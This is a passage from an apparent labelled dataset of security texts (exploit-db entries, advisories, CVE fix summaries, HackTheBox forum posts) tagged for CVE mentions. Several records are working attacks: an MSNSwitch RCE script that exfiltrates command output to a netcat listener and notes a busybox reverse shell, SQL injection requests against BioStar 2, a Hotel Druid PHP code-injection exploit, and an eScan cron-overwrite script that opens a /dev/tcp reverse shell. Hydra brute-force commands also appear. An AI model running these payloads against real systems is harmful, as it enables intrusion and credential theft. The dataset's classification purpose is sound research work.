headers from untrusted sources to eliminate `\\r\\n`.\n\n### References\n\nhttps://hackerone.com/reports/409943\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12116\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "source": "github_advisory", "timestamp": "2022-07-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9f6ae42961d745b68c08", "text": "A small hint for the second users flag.txt. Read your netstat output carefully and you will notice that there is a different ip adress for ftp.", "source": "hackthebox", "timestamp": "2022-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "357a266c3fe5871710a1", "text": "MSNSwitch Firmware MNT.2408 - Remote Code Execution\n\nExploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)\nGoogle Dork: n/a\nDate:9/1/2022\nExploit Author: Eli Fulkerson\nVendor Homepage: https://www.msnswitch.com/\nVersion: MNT.2408\nTested on: MNT.2408 firmware\nCVE: CVE-2022-32429\n\n#!/usr/bin/python3\n\n\n\"\"\"\n\nPOC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.\n\nConfiguration dump only requires HTTP access.\nFull RCE requires you to be on the same subnet as the device.\n\n\"\"\"\n\nimport requests\nimport sys\nimport urllib.parse\nimport readline\nimport random\nimport string\n\n\n# listen with \"ncat -lk {LISTENER_PORT}\" on LISTENER_HOST\nLISTENER_HOST = \"192.168.EDIT.ME\"\nLISTENER_PORT = 3434\n\n# target msnswitch\nTARGET=\"192.168.EDIT.ME2\"\nPORT=80\n\nUSERNAME = None\nPASSWORD = None\n\n\"\"\"\nFirst vulnerability, unauthenticated configuration/credential dump\n\"\"\"\nif USERNAME == None or PASSWORD == None:\n\t# lets just ask\n\thack_url=f\"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh\"\n\tsession = requests.session()\n\n\tdata = session.get(hack_url)\n\tfor each in data.text.split('\\n'):\n\t\tkey = None\n\t\tval = None\n\n\t\ttry:\n\t\t\tkey = each.strip().split('=')[0]\n\t\t\tval = each.strip().split('=')[1]\n\t\texcept:\n\t\t\tpass\n\n\t\tif key == \"Account1\":\n\t\t\tUSERNAME = val\n\t\tif key == \"Password1\":\n\t\t\tPASSWORD = val\n\n\"\"\"\nSecond vulnerability, authenticated command execution\n\nThis only works on the local lan.\n\nfor full reverse shell, modify and upload netcat busybox shell script to /tmp:\n\n\tshell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f\n\tdownload to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp\n\nref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox\n\"\"\"\n\nsession = requests.session()\n\n# initial login, establishes our Cookie\nburp0_url = f\"http://{TARGET}:{PORT}/goform/login\"\nburp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Origin\": f\"http://{TARGET}\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": \"http://192.168.120.17/login.asp\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\nburp0_data = {\"login\": \"1\", \"user\": USERNAME, \"password\": PASSWORD}\nsession.post(burp0_url, headers=burp0_headers, data=burp0_data)\n\n# get our csrftoken\nburp0_url = f\"http://{TARGET}:{PORT}/saveUpgrade.asp\"\ndata = session.get(burp0_url)\n\ncsrftoken = data.text.split(\"?csrftoken=\")[1].split(\"\\\"\")[0]\n\nwhile True:\n\tCMD = input('x:')\n\tCMD_u = urllib.parse.quote_plus(CMD)\n\tfilename = ''.join(random.choice(string.ascii_letters) for _ in range(25))\n\n\ttry:\n\t\thack_url = f\"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}\"\n\n\t\tsession.get(hack_url, timeout=0.01)\n\texcept requests.exceptions.ReadTimeout:\n\t\tpass", "source": "exploitdb", "timestamp": "2022-11-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cf246a134d62ad65510b", "text": "Fat Free CRM vulnerable to Exposure of Sensitive Information\n\n[Severity: MEDIUM]\n\nFat Free CRM before 0.12.1 does not restrict XML serialization, which allows remote attackers to obtain sensitive information via a direct request, as demonstrated by a request for `users/1.xml`, a different vulnerability than CVE-2013-7224.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "470c4b80a395079d02b6", "text": "Suprema BioStar 2 v2.8.16 - SQL Injection\n\n# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection\n# Date: 26/03/2023\n# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)\n# Vendor Homepage: https://www.supremainc.com/\n# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp\n# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide\n# Version: 2.8.16\n# Tested on: Windows, Linux\n# CVE-2023-27167\n\n## Description\nA Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through \"values\" JSON parameter.\n\n## Request PoC #1\n'''\nPOST /api/users/absence?search_month=1 HTTP/1.1\nHost: biostar2.server.net\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-GB,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/json;charset=UTF-8\ncontent-language: en\nbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548\nContent-Length: 204\nOrigin: https://biostar2.server.net\nConnection: close\nReferer: https://biostar2.server.net/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"(select*from(select(sleep(4)))a)\",4840,20120]}],\"orders\":[],\"total\":false}}\n\n'''\n\nTime based SQL injection (set 4 – response delays for 8 seconds).\n\n'''\n\n## Request PoC #2\n'''\nPOST /api/users/absence?search_month=1 HTTP/1.1\nHost: biostar2.server.net\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-GB,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/json;charset=UTF-8\ncontent-language: en\nbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548\nContent-Length: 188\nOrigin: https://biostar2.server.net\nConnection: close\nReferer: https://biostar2.server.net/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"1 and 3523=03523\",4840,20120]}],\"orders\":[],\"total\":false}}\n\n'''\n\nBoolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)\n\n'''\n\n## Exploit with SQLmap\n\nSave the request from Burp Suite to file.\n\n'''\n---\nParameter: JSON #1* ((custom) POST)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: {\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"1 and 3523=03523\",4840,20120]}],\"orders\":[],\"total\":false}}\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: {\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"(select*from(select(sleep(7)))a)\",4840,20120]}],\"orders\":[],\"total\":false}}\n---\n[05:02:49] [INFO] testing MySQL\n[05:02:49] [INFO] confirming MySQL\n[05:02:50] [INFO] the back-end DBMS is MySQL\nback-end DBMS: MySQL > 5.0.0 (MariaDB fork)\n[05:02:50] [INFO] fetching database names\n[05:02:50] [INFO] fetching number of databases\n[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval\n[05:02:55] [INFO] retrieved: 2\n[05:03:12] [INFO] retrieved: biostar2_ac\n[05:03:56] [INFO] retrieved: information_schema\navailable databases [2]:\n[*] biostar2_ac\n[*] information schema\n\n'''", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cb50ab881d7456c026d4", "text": "CVE: CVE-2022-1534\n\n[{'lang': 'en', 'value': 'Buffer Over-read at parse_rawml.c:1416 in GitHub repository bfabiszewski/libmobi prior to 0.11. The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.'}]\n\nFix commit: Fix array boundary check when parsing inflections which could result in buffer over-read with corrupt input", "source": "cvefixes", "timestamp": "2022-04-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "edfa8d7b5ade20980511", "text": "Thanks a lot @onthesauce ! Thought that I’ve already tried to do that yesterday. But with a fresh set of eyes today and your cp tips I’ve managed to get the flag. Happy hacking!", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c5a90e5260d0cc5b9555", "text": "The task is to find a suitable list. Have a look at the page title. Can you find a vendor there? You have to bruteforce absolutely nothing", "source": "hackthebox", "timestamp": "2022-07-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "662697559cf4f6ce0088", "text": "CVE: CVE-2022-29248\n\n[{'lang': 'en', 'value': \"Guzzle is a PHP HTTP client. Guzzle prior to versions 6.5.6 and 7.4.3 contains a vulnerability with the cookie middleware. The vulnerability is that it is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header, allowing a malicious server to set cookies for unrelated domains. The cookie middleware is disabled by default, so most library consumers will not be affected by this issue. Only those who manually add the cookie middleware to the handler stack or construct the client with ['cookies' => true] are affected. Moreover, those who do not use the same Guzzle client to call multiple domains and have disabled redirect forwarding are not affected by this vulnerability. Guzzle versions 6.5.6 and 7.4.3 contain a patch for this issue. As a workaround, turn off the cookie middleware.\"}]\n\nFix commit: [7.x] Fix cross-domain cookie leakage (#3018)\n\nCo-authored-by: Tim Düsterhus <209270+TimWolla@users.noreply.github.com>", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f71ecf30c911cf9a54fd", "text": "Which of the subdomains are zones? Each zone has one SOA entry https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/", "source": "hackthebox", "timestamp": "2022-11-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7c1556238756d59d9682", "text": "I was stuck there, too…think of what you usualy test on logins. When you can’t directly bypass an authentication, maybe you can use an automation-tool that gets you a dump of credentials.", "source": "hackthebox", "timestamp": "2023-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c393979366f19838d75a", "text": "Don't have fom submit in lab appoiment\n\nHello, i’m try to capture de flag in appoiment lab, but saw the code page html and the page don’t have form submit event. So, the page login no make nothing. Somebody make can capture the flag ? Regards,", "source": "hackthebox", "timestamp": "2022-05-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "544982fab797f9e6c7d1", "text": "CVE: CVE-2022-0501\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Packagist ptrofimov/beanstalk_console prior to 1.7.12.'}]\n\nFix commit: Sanitize input", "source": "cvefixes", "timestamp": "2022-02-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d435a8ee6c65b966f488", "text": "I think you might be trying to do the same thing as me which I don’t know if it is possible, but that is to move the flag.txt to the directory so I could then open and read it. Instead however, I found it much easier to try and get the file to dump it’s contents to an error message.", "source": "hackthebox", "timestamp": "2023-01-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d23ebcd156b74253d92d", "text": "Hello mates, I’ve just finish the “ Skills Assessment - Service Login ” from the Login Brute Forcing module. As advice for the last exercise: Read carefully what is written in the question: As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. As you already know the employee name ** Create a custom username and password list Don’t forget to use sed to remove passwords: ** Shorter Than 8 ** With No Special Chars ** With No Numbers Use the correct syntax: ** hydra -L user.txt -P password.txt -u -f ssh://SERVER_IP:PORT -t 4 When you’ve got access to the ssh, then try to brute force the second user that can be found at /home/username hydra -l username -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4 And finally when you brute force the password, you can login with ssh user@IPADDRESS -p PORT and read the flag.txt from the home directory of the user.", "source": "hackthebox", "timestamp": "2022-04-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d63bda00761e22dbf6e6", "text": "Could you give us some additional hints how you were able to achieve it?", "source": "hackthebox", "timestamp": "2022-01-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8bbeae0f23509b637325", "text": "[Path Traversal] Unathenticated file read (CVE-2020-3452)\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\nhttps://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/\n\n## Impact\n\nImpact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n1.) Perform the following GET request:\nGET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1\nHost: ██████\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F\nConnection: close\nAccept: */*\nAccept-Language: en\nAccept-Encoding: gzip, deflate, br\n\n2.) The response will contain contents of portal_inc.lua\n\n## Suggested Mitigation/Remediation Actions\nCisco has released software updates that address this vulnerability.", "source": "hackerone", "timestamp": "2023-11-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "861e824c40bb662c1e34", "text": "SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)\n\n# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)\n# Date: 7/4/2022\n# Exploit Author: Momen Eldawakhly (Cyber Guy)\n# Vendor Homepage: https://www.sma.de\n# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R\n# Tested on: Linux [Firefox]\n# CVE : CVE-2021-46416\n\n# Proof of Concept\n\n============[ Normal user request ]============\n\nGET / HTTP/1.1\nHost: 192.168.1.4\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nCookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D\nUpgrade-Insecure-Requests: 1\n\n============[ Manipulated username request ]============\n\nGET / HTTP/1.1\nHost: 192.168.1.4\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nCookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D\nUpgrade-Insecure-Requests: 1", "source": "exploitdb", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "216217972c4b1b344834", "text": "How has this not been seen yet? I’m in. I’m pretty new but learning quickly. Been doing this and tryhackme for several months now. I have a pretty busy work week but I’d love to do stuff like this to learn faster. Hit me up on DMs if you’re interested.", "source": "hackthebox", "timestamp": "2022-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2401761aa21e85cfd604", "text": "SharpHound.ps1 doesn't work\n\nI’m trying Reel ( Hack The Box ). When I use SharpHound.ps1, the following error occurs everytime: nico@REEL C:\\Users\\nico>powershell -Exec Bypass Windows PowerShell Copyright (C) 2014 Microsoft Corporation. All rights reserved. PS C:\\Users\\nico> . .\\SharpHound.ps1 PS C:\\Users\\nico> Invoke-BloodHound -CollectionMethod All Exception calling \"Invoke\" with \"2\" argument(s): \"Method not found: '!!0[] System.Array.Empty()'.\" At C:\\Users\\nico\\SharpHound.ps1:642 char:88 + ... nvoke($Null, @(,$passed)) + ~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationExcep tion + FullyQualifiedErrorId : MissingMethodException This is the latest SharpHound.ps1. (I can’t use SharpHound.exe now)", "source": "hackthebox", "timestamp": "2022-11-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a534d6fd8afc706db690", "text": "CVE: CVE-2021-35939\n\n[{'lang': 'en', 'value': 'It was found that the fix for CVE-2017-7500 and CVE-2017-7501 was incomplete: the check was only implemented for the parent directory of the file to be created. A local unprivileged user who owns another ancestor directory could potentially use this flaw to gain root privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.'}]\n\nFix commit: Validate intermediate symlinks during installation, CVE-2021-35939\n\nWhenever directory changes during unpacking, walk the entire tree from\nstarting from / and validate any symlinks crossed, fail the install\non invalid links.\n\nThis is the first of step of many towards securing our file operations\nagainst local tamperers and besides plugging that one CVE, paves the way\nfor the next step by adding the necessary directory fd tracking.\nThis also bumps the rpm OS requirements to a whole new level by requiring\nthe *at() family of calls from POSIX-1.2008.\n\nThis necessarily does a whole lot of huffing and puffing we previously\ndid not do. It should be possible to cache secure (ie root-owned)\ndirectory structures to avoid validating everything a million times\nbut for now, just keeping things simple.", "source": "cvefixes", "timestamp": "2022-08-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c3c67345236ee6652be4", "text": "Hey, do we brute force for ssh or ftp for g.potter login?", "source": "hackthebox", "timestamp": "2022-03-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f2f5de5f23f09f3fbe2c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8541, CVE-2018-8542, CVE-2018-8543, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557, CVE-2018-8588.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4fea7d196c221e933251", "text": "What is best way to deploy Sharphound-Bloodhound in multiple forest environments using one-way trusts?\n\nVery new to bloodhound/sharphound and have this deployment question: what is the best way to deploy bloodhound and sharphound to maximize info collection and also minimize deployment complexity in multiple forest/multiple domain AD environments built using one-way trusts between the forests. There are 9 forests involved configured in an “environment”/“security enclave” design construct where the environments have a protection scheme relationship of most trusted, next trusted, least trusted and then within each of these 3 “environments” the “security enclaves” (which are also forests) have a similar construct of most trusted to next trusted to least trusted. So e.g. if Sharphound were deployed in the most trusted environment forest and that environment’s most trusted enclave, is there a way for that Sharphound to see everything across all the 9 forests?", "source": "hackersploit", "timestamp": "2023-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8bb12bccd3f943ad1de0", "text": "Priv Esc in eScan antivirus 7.0.32\n\nContext: This software has a file mwavupdate which is a crontab script. It creates a symlink to /etc/cron.d to make system run update using cronjob runasroot is a SUID binary file that allows unprivileged user change permission of some certain files using chmod . The mwavupdate is in the list too → Attacker can change permission of mwavupdate , overwriting the crontab by a malicious task to execute system command as root Exploit demo that gains reverse shell (localhost) #!/bin/bash # Modify permission of crontab /opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate # Modify crontab to run malicious command echo \"KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC 4xLzg4ODggPCYxJwo=\" | base64 -d > /opt/MicroWorld/etc/mwavupdate /opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate nc -nvlp 8888", "source": "parrotsec", "timestamp": "2023-06-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c54658bd2e9fa726c4b8", "text": "CVE: CVE-2021-41111\n\n[{'lang': 'en', 'value': 'Rundeck is an open source automation service with a web console, command line tools and a WebAPI. Prior to versions 3.4.5 and 3.3.15, an authenticated user with authorization to read webhooks in one project can craft a request to reveal Webhook definitions and tokens in another project. The user could use the revealed webhook tokens to trigger webhooks. Severity depends on trust level of authenticated users and whether any webhooks exist that trigger sensitive actions. There are patches for this vulnerability in versions 3.4.5 and 3.3.15. There are currently no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-mfqj-f22m-gv8j\n\nFix IDOR webhook get does not correctly authorize project", "source": "cvefixes", "timestamp": "2022-02-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "03bfcb6f7a2c602fd607", "text": "Hotel Druid 3.0.3 - Remote Code Execution (RCE)\n\n# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)\n# Date: 05/01/2022\n# Exploit Author: 0z09e (https://twitter.com/0z09e)\n# Vendor Homepage: https://www.hoteldruid.com/\n# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz\n# Version: 3.0.3\n# CVE : CVE-2022-22909\n\n#!/usr/bin/python3\nimport requests\nimport argparse\n\ndef login( target , username = \"\" , password = \"\", noauth=False):\n\tlogin_data = {\n\t\t\t\t\"vers_hinc\" : \"1\",\n\t\t\t\t\"nome_utente_phpr\" : username,\n\t\t\t\t\"password_phpr\" : password\n\t\t\t\t}\n\tif not noauth:\n\t\tlogin_req = requests.post(f\"{target}/inizio.php\" , data=login_data , verify=False )\n\t\tif ' ')[0]\n\t\t\tanno = login_req.text.split('')[0]\n\t\t\tret_data = {\"token\" : token , \"anno\" : anno}\n\t\t\t#print(\"ret data\" + ret_data)\n\t\t\treturn ret_data\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\tlogin_req = requests.get(f\"{target}/inizio.php\" , verify=False )\n\t\ttry:\n\t\t\tanno = login_req.text.split('')[0]\n\t\t\ttoken = \"\"\n\t\t\tret_data = {\"token\" : token , \"anno\" : anno}\n\t\t\treturn ret_data\n\t\texcept:\n\t\t\treturn False\n\ndef check_privilege(target , anno , token=\"\"):\n\tpriv_req = requests.get(f\"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti\" , verify=False)\n\t#print(priv_req.text)\n\tif \"Modify\" in priv_req.text:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef add_room(target , anno , token=\"\"):\n\tadd_room_data = {\n\t\t\t\t\"anno\": anno,\n\t\t\t\t\"id_sessione\": token,\n\t\t\t\t\"n_app\":\"{${system($_REQUEST['cmd'])}}\",\n\t\t\t\t\"crea_app\":\"SI\",\n\t\t\t\t\"crea_letti\":\"\",\n\t\t\t\t\"n_letti\":\"\",\n\t\t\t\t\"tipo_tabella\":\"appartamenti\"\n\t\t\t\t}\n\tadd_req = requests.post(f\"{target}/visualizza_tabelle.php\" , data=add_room_data , verify=False)\n\t#print(add_req.text)\n\tif \"has been added\" in add_req.text:\n\t\treturn True\n\telse:\n\t\treturn False\ndef test_code_execution(target):\n\tcode_execution_req = requests.get(f\"{target}/dati/selectappartamenti.php?cmd=id\")\n\tif \"uid=\" in code_execution_req.text:\n\t\treturn code_execution_req.text.split(\"\\n\")[0]\n\telse:\n\t\treturn False\n\n\ndef main():\n\n\tbanner = \"\"\"\\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$\n| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$\n| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \\ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$\n| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$\n| $$__ $$| $$ \\ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \\__/| $$ | $$| $$| $$ | $$\n| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$\n| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$\n|__/ |__/ \\______/ \\___/ \\_______/|__/ |_______/ |__/ \\______/ |__/ \\_______/\\n\\nExploit By - 0z09e (https://twitter.com/0z09e)\\n\\n\"\"\"\n\n\n\tparser = argparse.ArgumentParser()\n\treq_args = parser.add_argument_group('required arguments')\n\treq_args.add_argument(\"-t\" ,\"--target\" , help=\"Target URL. Example : http://10.20.30.40/path/to/hoteldruid\" , required=True)\n\treq_args.add_argument(\"-u\" , \"--username\" , help=\"Username\" , required=False)\n\treq_args.add_argument(\"-p\" , \"--password\" , help=\"password\", required=False)\n\treq_args.add_argument(\"--noauth\" , action=\"store_true\" , default=False , help=\"If No authentication is required to access the dashboard\", required=False)\n\targs = parser.parse_args()\n\n\ttarget = args.target\n\tif target[-1] == \"/\":\n\t\ttarget = target[:-1]\n\tnoauth = args.noauth\n\n\tusername = args.username\n\tpassword = args.password\n\n\tif noauth == False and (username == None or password == None):\n\t\tprint('[-] Please provide the authentication method.' )\n\t\tquit()\n\n\tprint(banner)\n\tif not noauth:\n\t\tprint(f\"[*] Logging in with the credential {username}:{password", "source": "exploitdb", "timestamp": "2022-02-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "56fa2753305881ae60c7", "text": "CVE: CVE-2022-23620\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions AbstractSxExportURLFactoryActionHandler#processSx does not escape anything from SSX document references when serializing it on filesystem, it is possible to for the HTML export process to contain reference elements containing filesystem syntax like \"../\", \"./\". or \"/\" in general. The referenced elements are not properly escaped. This issue has been resolved in version 13.6-rc-1. This issue can be worked around by limiting or disabling document export.'}]\n\nFix commit: XWIKI-18819: It's possible to save pretty much anything anywhere by creating and using an SSX/JSX containing \"../\" in its reference", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7fbf44ceba5e2db88632", "text": "%26%26s’h%09<<<$(rev<<<“txt.galf/%09tac”) could be flagged as malicious because of the ‘/’. Slash was blacklisted for me. Also you probably can still use ${PATH:0:1}, sometimes certain payloads would get reflected back at me as well, even though I could use the strings in them. Maybe try a little more obfuscation around your commands. Most commands are blacklisted on this box.", "source": "hackthebox", "timestamp": "2022-10-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "323da159e9681796d389", "text": "Amazon Best Sellers in Security Certifications Parrot Community: looking for the holy grail of pdfs to educate oneself If I were completely new to networking, security, Linux and pentesting, I would get the basics down by preparing for and taking the following certifications to start off my penetration testing career: CompTIA 